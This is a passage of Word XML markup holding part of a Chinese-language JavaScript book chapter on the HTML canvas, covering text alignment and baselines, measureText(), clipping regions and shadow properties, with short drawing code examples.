        <w:t>展示了这两个属性的可能值，每个文本字符串下面的细线就是基线（</w:t>
      </w:r>
      <w:r>
        <w:t>baseline</w:t>
      </w:r>
      <w:r>
        <w:t>），那个小方框标记了传递给</w:t>
      </w:r>
      <w:r>
        <w:t>fillText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的点</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3998343" cy="1958196"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="74" name="00074.jpeg" descr="000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4.jpeg" descr="00074.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3998343" cy="1958196"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>textAlign</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>textBaseline</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>textAlign</w:t>
      </w:r>
      <w:r>
        <w:t>属性的默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>"start"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>要注意的是：对于从左到右的文本而言，</w:t>
      </w:r>
      <w:r>
        <w:t>"start"</w:t>
      </w:r>
      <w:r>
        <w:t>方式的对齐和</w:t>
      </w:r>
      <w:r>
        <w:t>"left"</w:t>
      </w:r>
      <w:r>
        <w:t>方式的对齐是一样的，</w:t>
      </w:r>
      <w:r>
        <w:t>"end"</w:t>
      </w:r>
      <w:r>
        <w:t>方式的对齐和</w:t>
      </w:r>
      <w:r>
        <w:t>"right"</w:t>
      </w:r>
      <w:r>
        <w:t>方式的对齐是一样的。但是，如果设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>di</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>"rtl"</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>right-to-left</w:t>
      </w:r>
      <w:r>
        <w:t>），那么</w:t>
      </w:r>
      <w:r>
        <w:t>"start"</w:t>
      </w:r>
      <w:r>
        <w:t>方式的对齐和</w:t>
      </w:r>
      <w:r>
        <w:t>"right"</w:t>
      </w:r>
      <w:r>
        <w:t>方式的对齐是一样的，同样</w:t>
      </w:r>
      <w:r>
        <w:t>"end"</w:t>
      </w:r>
      <w:r>
        <w:t>方式的对齐和</w:t>
      </w:r>
      <w:r>
        <w:t>"left"</w:t>
      </w:r>
      <w:r>
        <w:t>方式的对齐是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>textBaseline</w:t>
      </w:r>
      <w:r>
        <w:t>属性的默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>"alphabetic"</w:t>
      </w:r>
      <w:r>
        <w:t>，它适合用于拉丁语系和其他类似语系的字母。</w:t>
      </w:r>
      <w:r>
        <w:t>"ideographic"</w:t>
      </w:r>
      <w:r>
        <w:t>值用于诸如中文和日文之类的表意文字。</w:t>
      </w:r>
      <w:r>
        <w:t>"hanging"</w:t>
      </w:r>
      <w:r>
        <w:t>值则是用于梵文和类似的文字（大多用于印度语）。</w:t>
      </w:r>
      <w:r>
        <w:t>"top"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"middle"</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>"bottom"</w:t>
      </w:r>
      <w:r>
        <w:t>这样的基线都是纯几何基线，它们都是基于设置的字体的</w:t>
      </w:r>
      <w:r>
        <w:t>"emsq</w:t>
      </w:r>
      <w:r>
        <w:t>uare"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fillText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>strokeText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法同时还接受第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个可选的参数。该参数指定文本展现的最大宽度。当使用</w:t>
      </w:r>
      <w:r>
        <w:t>font</w:t>
      </w:r>
      <w:r>
        <w:t>属性绘制文本的时候，如果文本宽度比指定宽度大，那么画布会通过缩放或者采用更窄或更小的字体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果想要在绘制文本前自己先度量文本的宽度，那么可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>measureText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。该方法返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>TextMetrics</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它指定在使用当前字体绘制文本时的尺寸。截止撰写本书时，</w:t>
      </w:r>
      <w:r>
        <w:t>TextMetrics</w:t>
      </w:r>
      <w:r>
        <w:t>对象中包含的唯一</w:t>
      </w:r>
      <w:r>
        <w:t>"metric"</w:t>
      </w:r>
      <w:r>
        <w:t>的是</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>。可以通过如下方式来获取一个字</w:t>
      </w:r>
      <w:r>
        <w:t>符串的屏幕显示宽度：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var width=c.measureText(text).width;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="540" w:name="21_4_10_Cai_Jian_"/>
      <w:r>
        <w:t>21.4.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　裁剪</w:t>
      </w:r>
      <w:bookmarkEnd w:id="540"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在定义一条路径之后，通常会调用</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法或者</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（或者两者都调用）。除此之外，还可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>clip()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来定义一个裁剪区域。一旦定义了一个裁剪区域，在该区域外将不会绘制任何内容。图</w:t>
      </w:r>
      <w:r>
        <w:t>21-3</w:t>
      </w:r>
      <w:r>
        <w:t>展示了一个使用了裁剪区域来绘制的图形，在该图形中，勾勒中间的竖直条带以及下面的文字时都没有使用裁剪区域，而在填充三角形之前，定义了三角形裁剪区域。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:t>21-13</w:t>
      </w:r>
      <w:r>
        <w:t>是使用了例</w:t>
      </w:r>
      <w:r>
        <w:t>21-4</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>polygon()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来生成的，代码如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一些绘制属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.font="bold 60pt sans-serif";//</w:t>
      </w:r>
      <w:r>
        <w:t>大号字体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineWidth=2;//</w:t>
      </w:r>
      <w:r>
        <w:t>窄线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.strokeStyle="#000";//</w:t>
      </w:r>
      <w:r>
        <w:t>黑色线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>勾勒矩形轮廓和文本轮廓</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.strokeRect(175,25,50,325);//</w:t>
      </w:r>
      <w:r>
        <w:t>中间竖直的条带</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.strokeText("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>",15,330);//</w:t>
      </w:r>
      <w:r>
        <w:t>注意使用的是</w:t>
      </w:r>
      <w:r>
        <w:t>strokeText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法而不是</w:t>
      </w:r>
      <w:r>
        <w:t>fillText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在外部定义一条包含内部的复杂路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>polygon(c,3,200,225,200);//</w:t>
      </w:r>
      <w:r>
        <w:t>大三角形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>polygon(c,3,200,225,100,0,true);//</w:t>
      </w:r>
      <w:r>
        <w:t>在内部再绘制一个小三角形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将该路径定义成裁剪区域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.clip();//</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个像素宽的线段来勾勒路径，完全在裁剪区域内</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>c.lineWidth=10;//</w:t>
      </w:r>
      <w:r>
        <w:t>另外</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个像素的线段被裁剪了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.stroke</w:t>
      </w:r>
      <w:r>
        <w:t>();//</w:t>
      </w:r>
      <w:r>
        <w:t>填充在裁剪区域内的矩形部分和文本部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillStyle="#aaa"//</w:t>
      </w:r>
      <w:r>
        <w:t>暗灰色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillRect(175,25,50,325);//</w:t>
      </w:r>
      <w:r>
        <w:t>填充竖直的条带</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillStyle="#888"//</w:t>
      </w:r>
      <w:r>
        <w:t>深灰色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillText("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>",15,330);//</w:t>
      </w:r>
      <w:r>
        <w:t>填充文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251735040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4019909" cy="2510286"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="75" name="00075.jpeg" descr="000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5.jpeg" descr="00075.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4019909" cy="2510286"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　未裁剪的勾勒和裁剪的填充</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意很重要的一点是：当调用</w:t>
      </w:r>
      <w:r>
        <w:t>clip()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时，当前路径自身就会裁剪到当前裁剪区域中，之后，被裁剪的路径就变成了新的裁剪区域。这意味着，</w:t>
      </w:r>
      <w:r>
        <w:t>clip()</w:t>
      </w:r>
      <w:r>
        <w:t>方法只会缩小裁剪区域，</w:t>
      </w:r>
      <w:r>
        <w:t>永远不会放大裁剪区域。由于没有提供重置裁剪区域的方法，因此在调用</w:t>
      </w:r>
      <w:r>
        <w:t>clip()</w:t>
      </w:r>
      <w:r>
        <w:t>之前通常要调用</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，以便于之后恢复未裁剪区域。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="541" w:name="21_4_11_Yin_Ying_"/>
      <w:r>
        <w:t>21.4.11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　阴影</w:t>
      </w:r>
      <w:bookmarkEnd w:id="541"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个图形属性用于控制绘制下拉阴影。如果正确设置这些属性，绘制的任何线段、区域、文本以及图片都会拥有下拉阴影，这样外观上看起来就像它浮出了</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>画布表面。图</w:t>
      </w:r>
      <w:r>
        <w:t>21-14</w:t>
      </w:r>
      <w:r>
        <w:t>展示了填充的矩形下的阴影、勾勒的矩形下的阴影以及填充的文本下的阴影。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>shadowColor</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定阴影的颜色。其默认值是完全透明的黑色，</w:t>
      </w:r>
      <w:r>
        <w:t>因此如果没有将该属性设置为半透明色或者不透明色，阴影都是不可见的。该属性只能设置为一个表示颜色的字符串：图案和渐变都是不允许用于阴影的。使用半透明色的阴影可以产生很逼真的阴影效果，因为透过它还能够看到背景。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>shadowOffsetX</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>shadowOffsetY</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定阴影的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴的偏移量。这两个属性的默认值都是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，表示直接将阴影绘制在图形正下方，在这种位置阴影是不可见的。如果将这两个属性都设置为一个正值，那么阴影会出现在图形的右下角位置，就好像有一个左上角的光源从计算机屏幕外面照射到画布上。偏移量</w:t>
      </w:r>
      <w:r>
        <w:t>越大，产生的阴影也越大，同时会感觉绘制的物体在画布上浮得也越高。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>shadowBlur</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了阴影边缘的模糊程度。其默认值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，表示产生一个清晰明亮的阴影。该属性值越大表示阴影越模糊。该属性是高斯模糊函数的一个参数，和像素的大小以及长度无关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-8</w:t>
      </w:r>
      <w:r>
        <w:t>所示代码是用于绘制图</w:t>
      </w:r>
      <w:r>
        <w:t>21-4</w:t>
      </w:r>
      <w:r>
        <w:t>所示图形。该段代码展示了如何使用这</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个用于绘制阴影的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251736064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3998343" cy="2643996"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="76" name="00076.jpeg" descr="000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6.jpeg" descr="00076.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3998343" cy="2643996"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　自动生成的阴影</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-8</w:t>
      </w:r>
      <w:r>
        <w:t>：设置阴影属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一种不明显的阴影</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.shadowColor="rgba(100,100,100,.4)";//</w:t>
      </w:r>
      <w:r>
        <w:t>半透明灰色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.shadowOffsetX=c.shadowOffsetY=3;//</w:t>
      </w:r>
      <w:r>
        <w:t>偏移阴影到右下角部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.shadowBlur=5;//</w:t>
      </w:r>
      <w:r>
        <w:t>柔化阴影的边缘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用阴影在一个蓝色的方框中绘制一些文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineWidth=10;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.strokeStyle="blue";</w:t>
